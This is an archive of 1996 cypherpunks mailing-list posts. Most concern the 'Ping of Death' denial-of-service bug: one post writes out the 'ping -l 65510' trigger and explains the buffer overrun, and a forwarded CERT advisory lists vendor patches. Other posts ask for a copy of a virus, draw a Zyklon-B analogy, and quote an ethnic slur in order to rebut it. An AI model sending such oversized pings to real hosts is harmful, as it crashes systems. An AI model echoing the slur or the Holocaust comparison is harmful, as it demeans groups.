     page on the topic. The summaries are presented there, but if you are
     really curious or want details I can forward on specific messages to
     you. It's at http://www.sophist.demon.co.uk/ping, but it *is* only
     covering the results of a ping, not the internals. (I'm thinking more
     from a "how-can-I-stop-it" point of view than a
     "why-does-it-happen"...)

I just wanted to note that some of the diagnoses people are using to track
this problem might be a bit shaky.  For example, if you're not doing your
diagnosis on the console or on a serial terminal, the machine might appear
to be "hung" during the test when in fact you've simply blocked it from
receiving network traffic.  (Not that this isn't a problem, mind you.)
I would also like to start a discussion on just what the vulnerability is
vs. what systems are vulnerable.
This may be quite well known (and some of it is inferred from previous
messages), but I'd like to double check with people that may have
definitive answers.  Using snoop on Solaris 2.5, I watched a ``ping -l
65510'' from an NT 4.0 box.  At first I thought maybe Microsoft was
sending IP or ICMP packets with bad options, or field values.  But, it
appears there is nothing malformed with the packets other than they are
too long (per RFC 791 - INTERNET PROTOCOL SPECIFICATION).  ``ping -l                                                                
65510'' ==> ICMP datagram of 8 (ICMP hdr) + 65510 (data) = 65518 octets.
Add to this the minium IP hdr of 20 octets and get we 65538 octets.  This
is 2 octets > maximum allowed IP datagram of 65536.

The real problem appears to be that when a [vulnerable] host gets this
huge ping datagram, it has to create a simular ping datagram to return to
the sender.  The return datagram must return the incoming ping datagram's
data section as its own.

So when the [vulnerable] host is assembling this huge datagram it does
something like

     ``memcpy( assemble_buffer+20+8, ping_pkt->data, ping_pkt->data_len)''

over running the assemble_buffer which is a fixed value of 65536.  On the
systems that instantaneously reboot, we are just "fortunate" enough to
have stomped on some important kernel data structure.

Genocide
Head of the Genocide2600 Group


============================================================================
		   **Coming soon! www.Genocide2600.com!
         ____________________
  *---===|                  |===---*
  *---===|     Genocide     |===---*     "You can be a king or a street
  *---===|       2600       |===---*   sweeper, but everyone dances with the
  *---===|__________________|===---*              Grim Reaper."
                                       
Email:  gen2600@aracnet.com	Web:  http://www.aracnet.com/~gen2600

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
	It is by caffeine alone that I set my mind in motion.
	It is by the Mountain Dew that the thoughts acquire speed,
	the lips acquire stains, the stains become a warning.
	It is by caffeine alone that I set my mind in motion.
================================================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Genocide <gen2600@aracnet.com>
Date: Wed, 18 Dec 1996 11:44:40 -0800 (PST)
To: cypherpunks@toad.com
Subject: CERT Advisory CA-96.26 - Denial-of-Service Attack via ping (fwd)
Message-ID: <Pine.LNX.3.95.961218114304.24125H-100000@shelob.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain



	Ok, fine :) here is the CERT on the "Ping of Death"
G/T

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
CERT(sm) Advisory CA-96.26
Original issue date: December 18, 1996
Last revised: --

Topic: Denial-of-Service Attack via ping
- -----------------------------------------------------------------------------

The CERT Coordination Center has received reports of a denial-of-service
attack using large ICMP datagrams. Exploitation details involving this
vulnerability have been widely distributed.

The CERT/CC team recommends installing vendor patches as they become
available.

We will update this advisory as we receive additional information. Please
check advisory files regularly for updates that relate to your site.

- -----------------------------------------------------------------------------
I.   Description

     The TCP/IP specification (the basis for many protocols used on the
     Internet) allows for a maximum packet size of up to 65536 octets (1 octet
     = 8 bits of data), containing a minimum of 20 octets of IP header
     information and 0 or more octets of optional information, with the rest
     of the packet being data. It is known that some systems will react in an
     unpredictable fashion when receiving oversized IP packets. Reports
     indicate a range of reactions including crashing, freezing, and
     rebooting.

     In particular, the reports received by the CERT Coordination Center
     indicate that Internet Control Message Protocol (ICMP) packets issued via
     the "ping" command have been used to trigger this behavior. ICMP is a
     subset of the TCP/IP suite of protocols that transmits error and control
     messages between systems. Two specific instances of the ICMP are the ICMP
     ECHO_REQUEST and ICMP ECHO_RESPONSE datagrams. These two instances can be
     used by a local host to determine whether a remote system is reachable
     via the network; this is commonly achieved using the "ping" command.

     Discussion in public forums has centered around the use of the "ping"
     command to construct oversized ICMP datagrams (which are encapsulated
     within an IP packet). Many ping implementations by default send ICMP
     datagrams consisting only of the 8 octets of ICMP header information but
     allow the user to specify a larger packet size if desired.

     You can read more information about this vulnerability on Mike
     Bremford's Web page. (Note that this is not a CERT/CC maintained
     page. We provide the URL here for your convenience.)

            http://www.sophist.demon.co.uk/ping/index.html

II.  Impact

     Systems receiving oversized ICMP datagrams may crash, freeze, or
     reboot, resulting in denial of service.

III. Solution

     First, since crashing a router or firewall may be part of a larger,
     multistage attack scenario, we encourage you to inspect the running
     configuration of any such systems that have crashed to ensure that the
     configuration information is what you expect it to be.

     Then install a patch from your vendor.

     Below is a list of vendors who have provided information about
     patches for this problem. Details are in Appendix A of this
     advisory; we will update the appendix as we receive more
     information. If your vendor's name is not on this list, please
     contact the vendor directly.

           Berkeley Software Design, Inc. (BSDI)
           Computer Associates, Intl. (products for NCR)
           Cray Research
           Digital Equipment Corporation
           Free BSD, Inc.
           Hewlett-Packard Company
           IBM Corporation
           Linux Systems
           NEC Corporation
           Open Software Foundation (OSF)
           The Santa Cruz Operation, Inc. (SCO)
           Sun Microsystems, Inc.

...........................................................................

Appendix A - Vendor Information

Below is a list of the vendors who have provided information for this
advisory. We will update this appendix as we receive additional information.
If you do not see your vendor's name, please contact the vendor directly.


Berkeley Software Design, Inc. (BSDI)
=====================================
  BSD/OS 2.1 is not vulnerable to this problem.  It correctly handles
  large packets without any problems.


Computer Associates, Intl.
==========================
(products for NCR)

   Not vulnerable.


Cray Research
=============
  Attempts to send oversized ICMP datagrams are rejected with
  appropriate error messages.  We believe that oversized ICMP datagrams
  sent to Unicos systems will also be rejected without crashing.



Digital Equipment Corporation
=============================
  MSG ID: SSRT0429 From DSNlink/DIA Database

  The following is important information concerning a potential denial of
  service issue which affects Digital UNIX Operating System, Digital UNIX
  MLS+, Firewall implementations, and Digital TCP/IP Services for OpenVMS AXP &
  VAX

  COMPONENT:  System Security / Potential Denial of Service

  DIGITAL UNIX     Version: 3.0, 3.0b, 3.2, 3.2c, 3.2de1, 3.2de2,
                            3.2f, 3.2g, 4.0, 4.0a
  DIGITAL UNIX MLS+ Version 3.1a
  DIGITAL TCP/IP Services for OpenVMS AXP & VAX Versions - 4.0, 4.1
  DIGITAL ULTRIX Versions 4.3, 4.3a, 4.4, 4.5
  DIGITAL Firewall for UNIX
  DIGITAL AltaVista Firewall for UNIX
  DIGITAL VAX/ELN

  For more information check the DSNlink/DIA Articles (keyword PING), or the
  URL http://www.service.digital.com/html/whats-new.html for the latest
  information.

  ADVISORY INFORMATION:

     Digital recently discovered a potential denial of service issue that
     may occur by remote systems exploiting a recently published problem while
     executing the 'ping' command. Solutions and initial communications
     began appearing in DSNlink/DIA FLASH/articles in late October, 1996.

  SEVERITY LEVEL:  High.

  SOLUTION:

     Digital has reacted promptly to this reported problem and a complete
     set of patch kits are being prepared for all currently supported
     platforms.

  The Digital patches may be obtained from your local Digital support
  channel or from the URL listed above. Please refer to the applicable README
  notes information prior to the installation of patch kits on your system.

  DIGITAL EQUIPMENT CORPORATION

  Copyright (c) Digital Equipment Corporation, 1996, All Rights Reserved.
  Unpublished Rights Reserved Under The  Copyright Laws Of The United States.


Free BSD, Inc.
==============
  We have fixed the problem in 2.1.6 and -current.


Hewlett-Packard Company
=======================

  For HP9000 Series 700 and 800 systems, apply the appropriate patch.
  See Hewlett-Packard Security Bulletin #000040 (HPSBUX9610-040) for further
  details. The bulletin is available from the HP SupportLine and
  ftp://info.cert.org/pub/vendors/hp/


          Patch Name(Platform/OS)   | Notes
          --------------------------+----------------------------------
          PHNE_9027 (s700 9.01)     : PHNE_7704 must first be installed
          PHNE_9028 (s700 9.03/5/7) : PHNE_7252 must first be installed
          PHNE_9030 (s700 10.00)    :             No patch dependencies
          PHNE_9032 (s700 10.01)    : PHNE_8168 must first be installed
          PHNE_9034 (s700 10.10)    : PHNE_8063 must first be installed
          PHNE_9036 (s700 10.20)    :             No patch dependencies
          --------------------------+----------------------------------
          PHNE_8672 (s800 9.00)     : PHNE_7197 must first be installed
          PHNE_9029 (s800 9.04)     : PHNE_7317 must first be installed
          PHNE_9031 (s800 10.00)    :             No patch dependencies
          PHNE_9033 (s800 10.01)    : PHNE_8169 must first be installed
          PHNE_9035 (s800 10.10)    : PHNE_8064 must first be installed
          PHNE_9037 (s800 10.20)    :             No patch dependencies
          --------------------------+----------------------------------

  For our MPE operating system, patches are in process. Watch for the issuance
  of our MPE security bulletin.


IBM Corporation
===============

  See the appropriate release below to determine your action.


  AIX 3.2
  -------
    Apply the following fix to your system:

       APAR - IX59644 (PTF - U444227 U444232)

    To determine if you have this PTF on your system, run the following
    command:

       lslpp -lB U444227 U444232


  AIX 4.1
  -------
    Apply the following fix to your system:

        APAR - IX59453

    To determine if you have this APAR on your system, run the following
    command:

       instfix -ik IX59453

    Or run the following command:

       lslpp -h bos.net.tcp.client

    Your version of bos.net.tcp.client should be 4.1.4.16 or later.


  AIX 4.2
  -------
    Apply the following fix to your system:

        APAR - IX61858

    To determine if you have this APAR on your system, run the following
    command:

       instfix -ik IX61858

    Or run the following command:

       lslpp -h bos.net.tcp.client

    Your version of bos.net.tcp.client should be 4.2.0.6 or later.


  IBM SNG Firewall
  ----------------

      NOTE: The fixes in this section should ONLY be applied to systems
      running the IBM Internet Connection Secured Network Gateway (SNG)
      firewall software.  They should be applied IN ADDITION TO the IBM
      AIX fixes listed in the previous section.

     IBM SNG V2.1
     ------------
         APAR - IR33376 PTF UR46673

     IBM SNG V2.2
     ------------
         APAR - IR33484 PTF UR46641


  To Order
  --------
    APARs may be ordered using Electronic Fix Distribution (via FixDist)
    or from the IBM Support Center.  For more information on FixDist,
    reference URL:

       http://service.software.ibm.com/aixsupport/

    or send e-mail to aixserv@austin.ibm.com with a subject of "FixDist".


  IBM and AIX are registered trademarks of International Business Machines
  Corporation.


Linux Systems
=============

  We recommend that you upgrade your Linux 1.3.x and 2.0.x kernels to Linux
  2.0.27. This is available from all the main archive sites such as

        ftp://ftp.cs.helsinki.fi/pub/Software/Linux

  Users wishing to remain with an earlier kernel version may download a
  patch from http://www.uk.linux.org/big-ping-patch. This patch will work with
  2.0.x kernel revisions but is untested with 1.3.x kernel revisions.

  Red Hat Linux has chosen to issue a 2.0.18 based release with the fix. Red
  Hat users should obtain this from

ftp://ftp.redhat.com/pub/redhat/redhat-4.0/updates/i386/kernel-2.0.18-6.i386.rpm


NEC Corporation
===============
- --------------------------------------------------------------------------
       OS               Version        Status
- ------------------   ------------   -------------------------------------
EWS-UX/V(Rel4.0)     R1.x - R6.x    not vulnerable
EWS-UX/V(Rel4.2)     R7.x - R10.x   not vulnerable
EWS-UX/V(Rel4.2MP)   R10.x          not vulnerable
UP-UX/V              R1.x - R4.x    not vulnerable
UP-UX/V(Rel4.2MP)    R5.x - R7.x    not vulnerable
UX/4800              R11.x          not vulnerable
- --------------------------------------------------------------------------

NCR
====
see Computer Associates, Intl.


Open Software Foundation (OSF)
==============================
  OSF's OSF/1 R1.3.3 maintenance release includes a solution for this
  problem.


The Santa Cruz Operation, Inc. (SCO)
===================================
  The following SCO products are known to be vulnerable:

  SCO OpenServer 5.0.0, 5.0.2
  SCO Internet FastStart 1.0.0, 1.1.0
  SCO Open Desktop 3.0
  SCO TCP/IP 1.2.1 on SCO Unix System V/386 Release 3.2 Version 4.2

  The symptoms encountered vary greatly and seem to be related to the type
  of network interface device being used. Support Level Supplement (SLS) OSS449
  is being developed for use with the following releases:

  SCO OpenServer 5.0.0, 5.0.2
  SCO Internet FastStart 1.0.0, 1.1.0.

  This SLS will be available in the near future. Watch the following URL for
  availability information of SLS OSS449:

  ftp://ftp.sco.COM/SLS/README

  Should more information become available for either SCO's OpenServer or
  UnixWare products, SCO will provide updated information for this advisory.


Sun Microsystems, Inc.
======================
  We are looking into this problem.

...........................................................................

- -----------------------------------------------------------------------------
The CERT Coordination Center staff thanks AUSCERT, the Australian Computer
Emergency Response Team, and DFN-CERT, the German team, for their
contributions to this advisory, and we thank Mike Bremford for permission to
cite the information he has made available to the community.
- -----------------------------------------------------------------------------

If you believe that your system has been compromised, contact the CERT
Coordination Center or your representative in the Forum of Incident Response
and Security Teams (see ftp://info.cert.org/pub/FIRST/first-contacts).


CERT/CC Contact Information
- ----------------------------
Email    cert@cert.org

Phone    +1 412-268-7090 (24-hour hotline)
                CERT personnel answer 8:30-5:00 p.m. EST(GMT-5) / EDT(GMT-4)
                and are on call for emergencies during other hours.

Fax      +1 412-268-6989

Postal address
         CERT Coordination Center
         Software Engineering Institute
         Carnegie Mellon University
         Pittsburgh PA 15213-3890
         USA

Using encryption
   We strongly urge you to encrypt sensitive information sent by email. We can
   support a shared DES key or PGP. Contact the CERT/CC for more information.
   Location of CERT PGP key
         ftp://info.cert.org/pub/CERT_PGP.key

Getting security information
   CERT publications and other security information are available from
        http://www.cert.org/
        ftp://info.cert.org/pub/

   CERT advisories and bulletins are also posted on the USENET newsgroup
        comp.security.announce

   To be added to our mailing list for advisories and bulletins, send your
   email address to
        cert-advisory-request@cert.org

- ---------------------------------------------------------------------------
Copyright 1996 Carnegie Mellon University
This material may be reproduced and distributed without permission provided
it is used for noncommercial purposes and the copyright statement is
included.

CERT is a service mark of Carnegie Mellon University.
- ---------------------------------------------------------------------------

This file: ftp://info.cert.org/pub/cert_advisories/CA-96.26.ping
           http://www.cert.org
               click on "CERT Advisories"


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Revision history





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Wed, 18 Dec 1996 11:43:46 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Parolees Can't Possess Crypto
In-Reply-To: <3.0.1.32.19961218104243.00720110@panix.com>
Message-ID: <v03007802aeddf8f807f4@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:42 AM -0500 12/18/96, Duncan Frissell wrote:
>The new federal parole guidelines that will ban some cons from the nets
>will also ban them from posessing crypto software which will also make
>virtually any computer use impossible.  "Main Justice" does say that with
>the Klinton Admins plans for universal access counter this proposal since
>the cons will have access at schools, libraries, etc. (not to mention
>Internet Cafes).

And these sorts of attempted restrictions will lend further support for
"Interenet Driver's Licenses," a la is-a-person credentials.

Between setting age limits for sites on the Net, and ensuring that wimmin
are not exposed to sexist sites, and keeping the ten million ex-cons and
permanently paroled proles off the Net, citizen-units will have to be
tracked constantly.

(Oh, as to libraries and schools, there are already moves to tie access to
possession of a library card, to stop the common practice of pranksters
leaving the library Web terminal with bookmarks to various X-rated sites,
or from leaving obscene/racist messages left on the screen. Doesn't stop
the practices, but goes a long way to suppressing such things. I wouldn't
be at all surprised to see the earliest cardreader gizmos (a la the new
smartcards needed for the latest Clipper abominations) applied first to
libraries and schools. Who could object to innocent children being
protected by having to carry ID cards? Or bracelets? Or tatoos?)

As to Internet Cafes, as various abuses are reported (think: death threats,
obscene posts to "rec.arts.after-school," encounters in IRC chat rooms,
etc.), there will be a clampdown on unrestricted use of such terminals. ID
cards, cardreaders, citizen-unit tracking, etc.

(One mechanism--lawyers can jump in--may be to have court precedents that
the owner of a terminal or PC is responsible for messages emanating from
his terminal. "I didn't send it" will not be an effective excuse. And to
some extent this is as it should be, vis-a-vis our usual points about
digital signatures and the need for carefully keeping one's personna
secure.)

--Tim May

Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jlucas4@capital.edu (Jesse Lucas)
Date: Wed, 18 Dec 1996 09:31:24 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: The virus I got...
Message-ID: <9612181728.AA09486@monoceros.capital.edu>
MIME-Version: 1.0
Content-Type: text/plain



   Anyone keep a copy of that file?  I deleted mine before I had a chance to save
save it.  Please send.  

jlucas4@capital.edu





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 18 Dec 1996 09:39:19 -0800 (PST)
To: cypherpunks <cypherpunks@toad.com>
Subject: [Contact Information]
Message-ID: <Pine.SUN.3.94.961218123603.25688F-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain



I'll be off the list for a time.
I am going to be traveling where there are no net connections to be had so
I am unsubscribing to keep the mail box to a sane level.

E-mail will be held, but not read for some time.

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Genocide <gen2600@aracnet.com>
Date: Wed, 18 Dec 1996 13:04:33 -0800 (PST)
To: ADAO-CRUZ Nuno <n.adao@student.iag.ucl.ac.be>
Subject: Re: virus from fuck@yourself.up
In-Reply-To: <9612190009.AA22522@doyens2>
Message-ID: <Pine.LNX.3.95.961218130258.28392A-100000@shelob.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 18 Dec 1996, ADAO-CRUZ Nuno wrote:

>  I send an e-mail to  fuck@yourself.up but i receive the message:host
> unknown. Could someone explain that to me please.

	Please...tell me you are kidding!?  

Genocide
Head of the Genocide2600 Group


============================================================================
		   **Coming soon! www.Genocide2600.com!
         ____________________
  *---===|                  |===---*
  *---===|     Genocide     |===---*     "You can be a king or a street
  *---===|       2600       |===---*   sweeper, but everyone dances with the
  *---===|__________________|===---*              Grim Reaper."
                                       
Email:  gen2600@aracnet.com	Web:  http://www.aracnet.com/~gen2600

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
	It is by caffeine alone that I set my mind in motion.
	It is by the Mountain Dew that the thoughts acquire speed,
	the lips acquire stains, the stains become a warning.
	It is by caffeine alone that I set my mind in motion.
================================================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Wed, 18 Dec 1996 10:16:16 -0800 (PST)
To: Blake Coverett <blake@bcdev.com>
Subject: RE: Securing ActiveX.
In-Reply-To: <01BBEC70.68E48680@bcdev.com>
Message-ID: <Pine.SUN.3.91.961218131417.12175E-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 17 Dec 1996, Blake Coverett wrote:

> It's not a Java vs ActiveX thing for me at all.  What is important is that
> some of the applets I write can't function in a sandbox, they need access
> to the disk and other resources for business reasons.  For this type of
> thing signed code without a sandbox is the only choice.

Sure they can.  Get a file system that honors security and limit that 
applet's access to certain directories only where the data it needs 
lives.  Do not give it access to everything.  A sandbox will allow this.
 
> What I'd really like is the sort of thing Bill Frantz is describing on 
> another branch of this thread.  Signed code and an administrator 
> defined policy that specified for a given signature exactly what 
> types of resources should be accessible.  Anything from don't
> execute and audit a security alarm to complete access to the
> whole machine.

Same difference whether you use the signature or some other thing to 
grant or revoke access to certain resources.  Though if you use a 
signature as in the author who wrote it as opposed to something like a 
CRC which is unique for every control - then you are opening a wider hole 
than you want.  With apps like that you want to set security perms for 
each application, not all applications that were written by Macrosoft. :)
  
> > How many users know how to download the jdk and run the java vm locally?  
> 
> They don't need to.  All they need to do is unzip the java classes into their 
> classpath and all of the normal restrictions on an applet are ignored.  
> Think it would be very hard to persuade a user to do just that in order
> to play a kewl java game?  More importantly it shows that even expert
> users don't always know where the holes in the sandbox are.

Fine - how many game users who how to unzip the java classes into their 
classpath?  Question is of knowledge not of what action they will take.

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    | "If  you're  gonna die,  die  with your|./|\.
..\|/..|sunder@sundernet.com|boots on;  If you're  gonna  try,  just |/\|/\
<--*-->| ------------------ |stick around; Gonna cry? Just move along|\/|\/
../|\..| "A toast to Odin,  |you're gonna die, you're gonna die!"    |.\|/.
.+.v.+.|God of screwdrivers"|  --Iron Maiden "Die With Your Boots on"|.....
======================== http://www.sundernet.com =========================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: peter.allan@aeat.co.uk (Peter M Allan)
Date: Wed, 18 Dec 1996 05:27:54 -0800 (PST)
To: cypherpunks@toad.com
Subject: Sys Admin: call for papers
Message-ID: <9612181328.AA09417@clare.risley.aeat.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



Sys Admin magazine (mainly Unix, but with traces
of NT integration creeping in) calls for papers
in each issue on subjects chosen by the editors.

I am sure there are people on this list capable of
writing much of the June 1997 issue, and taking
this opportunity to educate on the benfits of crypto.



This is an extract from the Jan 1997 issue, page 91.


We suggest that if you are interested in contributing,
you first submit a proposal to us.  If the proposal
seems appropriate, we'll ask you to submit a manuscript.
If the manuscript is accepted, we'll edit it, print it,
and pay you for it.  For more detailed information,
request a copy of our Author Guidelines (we can fax,
email or mail them to you).  Please address requests for
guidelines, proposals, and manuscripts to:

Amber Ankerholz
   saletter@rdpub.com
or
   saletter@mfi.com



June 1997    Security
Proposals   due 3 Feb 1997
Manuscripts due 3 Mar 1997

Security basics -  A review

How to conduct a security audit

Cryptography tools for the administrator

Web security issues

Firewalls - an update



 -- Peter Allan    peter.allan@aeat.co.uk




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@cybercash.com>
Date: Wed, 18 Dec 1996 10:36:27 -0800 (PST)
To: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Subject: Re: ITAR -> EAR; loss of First Amendment Rights.
Message-ID: <3.0.32.19961218133324.009fad80@cybercash.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 09:43 PM 12/14/96 -0500, Peter D. Junger wrote:
>: I am not aware of any prior time when the government
>: attempted to claim that printed material, freely
>: available in bookstores and newsstands to US citizens,
>: became contraband when sold or given to a non-citizen.
>
>A literal reading of the ITAR's provisions relating to cryptography
>leads to exactly that result.  And there have been strong suggestions
>that that is the intended result in some of the statements made by
>representatives of the State Department.  
>
>If you are interested in this you might look into MIT's experiences
>when they published the book with the PGP source code.

Look back at the first few volumes of Cryptologia in which this debate
was documented -- back in 1978 ff.

The NSA under Adm. Inman tried to get crypto declared born classified,
just like atomic weapons work.  Congress told him NO.

Perhaps it's time for Congress to speak again.

You'd think these folks would take 'no' for an answer....

 - Carl

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMrg46VQXJENzYr45AQEyKwP+NEErSUEv/nOQvN5C6sLLq2CxDR/YYEsp
mUvwtNxUjXT6iL71hA/5Pn7n1tdRUipkOeUXx5OGoOJ4rtZ/USIEXtqogLsCjXHo
OsECu1ytMT/d9MFkSjM3ARenVXE5u39Q4HBSJ+RGnU9mTbB7r2R4dYsjeTQF2rkG
pKEVFxNFMio=
=5cLt
-----END PGP SIGNATURE-----


+------------------------------------------------------------------+
|Carl M. Ellison  cme@cybercash.com   http://www.clark.net/pub/cme |
|CyberCash, Inc.                      http://www.cybercash.com/    |
|207 Grindall Street   PGP 2.6.2: 61E2DE7FCB9D7984E9C8048BA63221A2 |
|Baltimore MD 21230-4103  T:(410) 727-4288  F:(410)727-4293        |
+------------------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjb@ny.ubs.com
Date: Wed, 18 Dec 1996 10:38:04 -0800 (PST)
To: cypherpunks@toad.com
Subject: pdf and ps files
Message-ID: <199612181837.NAA00738@sherry.ny.ubs.com>
MIME-Version: 1.0
Content-Type: text/plain


does anyone know of any routines and/or scripts to extract text from
.pdf or .pd files (acrobat or postscript, that is).

crypto relavance, of course, i am trying to extract the gwbasic code from
the army crypytanalysis manual that just appeared on the web. (-:

cheers,
	-paul




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Neely <accessnt@ozemail.com.au>
Date: Tue, 17 Dec 1996 20:44:32 -0800 (PST)
To: SUCRUM22_at_INDY-ADP@smtp-gw.cv62.navy.mil
Subject: Re: Maybe the CypherPunks *do* have some heart
Message-ID: <3.0.32.19961218140815.006c4f78@ozemail.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Just a quick note to say that Houghton-Mifflin has posted a request for
people to _STOP_ emailing them! This wasn't a hoax, but they have reached
their email target numbers
 
> The Houghton-Mifflin Publishing Co.. is giving books to children's 

Mark Neely - accessnt@ozemail.com.au
Lawyer, Internet Consultant, Professional Cynic & Author

BizWeb: For Serious Intrepreneurs - www.maximedia.com.au/bizweb




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vipul Ved Prakash <vipul@pobox.com>
Date: Wed, 18 Dec 1996 00:49:12 -0800 (PST)
To: cypherpunks@toad.com (Cypherpunks)
Subject: NSClean
Message-ID: <199612181422.OAA00228@fountainhead.net>
MIME-Version: 1.0
Content-Type: text


*** NSCLean, IECLean provide privacy for surfers

Heightened awareness of cookies, user IDs, history files and the like
has left some web users a little spooked about their favorite
browser's ability to track their movements over the Internet. Surfers
can erase Netscape's electronic trail with NSClean, available from
AXXIS Corporation. For the full text story, see
http://www.merc.com/stories/cgi/story.cgi?id=788417-312
AXXIS Corporation also released IEClean software which enables
Microsoft Internet Explorer users to surf privately. For the full text
story, see http://www.merc.com/stories/cgi/story.cgi?id=788418-28e


-- 

Vipul Ved Prakash                 | - Electronic Security & Crypto 
vipul@pobox.com 	          | - Internet & Intranets 
91 11 2233328                     | - Web Development & PERL 
198 Madhuban IP Extension         | - Linux & Open Systems 
Delhi, INDIA 110 092              | - (Networked) Multimedia





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vipul Ved Prakash <vipul@pobox.com>
Date: Wed, 18 Dec 1996 00:51:34 -0800 (PST)
To: cypherpunks@toad.com (Cypherpunks)
Subject: No computer access for criminals
Message-ID: <199612181425.OAA00260@fountainhead.net>
MIME-Version: 1.0
Content-Type: text


*** U.S. Parole Commission to restrict computer access

The U.S. Parole Commission will restrict computer use by certain
high-risk, convicted criminals who have been released from prison on
parole, the Justice Department said Monday. It said the panel made the
decision Dec. 4 after noting information was available on the Internet
and computer online services involving offenses such as child
molestation, hate crimes and illegal use of explosives. An official
said, "We cannot ignore the possibility that such offenders may be
tempted to use computer services to repeat their crimes." For the full
text story, see
http://www.merc.com/stories/cgi/story.cgi?id=792329-ccd

-- 

Vipul Ved Prakash                 | - Electronic Security & Crypto 
vipul@pobox.com 	          | - Internet & Intranets 
91 11 2233328                     | - Web Development & PERL 
198 Madhuban IP Extension         | - Linux & Open Systems 
Delhi, INDIA 110 092              | - (Networked) Multimedia





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Wed, 18 Dec 1996 14:39:49 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Attention Journalists (was Re: TIS_sue)
In-Reply-To: <1.5.4.32.19961217131004.006a82e4@pop.pipeline.com>
Message-ID: <v03007800aede21e3fb62@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:08 AM -0600 12/17/96, Andrew Loewenstern wrote:
>>    In a development that may signal the beginning of the end
>>    of the long standing encryption export control controversy,
>>    TIS today announced that products using very strong
>>    cryptography with its RecoverKey technology have been approved
>>    for general purpose export control under new export
>>    regulations.
>
>For those journalists reading the list that aren't experts in cryptology:
>if
>someone outside of your control can recover the key, then it is NOT "very
>strong" cryptography.

Another piece of advice for journalists: stop saying the latest proposal
"may signal the beginning of the end of the impasse..." and similar such
puffery.

We heard this about the Lotus 40+24 stupid idea a year or so ago, we heard
this about the IBM key recovery thing a few months ago, we heard this about
the H-P/Intel scheme a few weeks ago, and now we're hearing about it again
with the latest revision of the TIS proposal.

Journalists seem to be just rewriting the press releases of these
companies, all of whom are building the technologies to sell out the
remaining liberties of Americans. These corporations, and the journalist
who tout their stories, are the modern equivalent of the German
companies...you know the reference.

("The development of Zyklon-B may signal the beginning of the end of the
long standing controversy regarding the Jewish problem.")

--Tim May

Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Fri, 20 Dec 1996 11:39:15 -0800 (PST)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: RE: Securing ActiveX.
Message-ID: <851098860.921944.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> Armenians are murderous cowards. They killed over 2 million Moslems in
> this century alone - mostly women and children.
 
I note that along with this racist generalisation you decided to post the 
following rant:

>As usual, Timmy May spouts racist, anti-Semitic shit. As usual, he has
>no idea what he's talking about. So what else is new...

As well as a number of other rants along those lines. There is little 
difference between over generalisations of the kind you made above 
and, for example, discriminating against someone on the basis of 
race, colour, religion etc.


  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
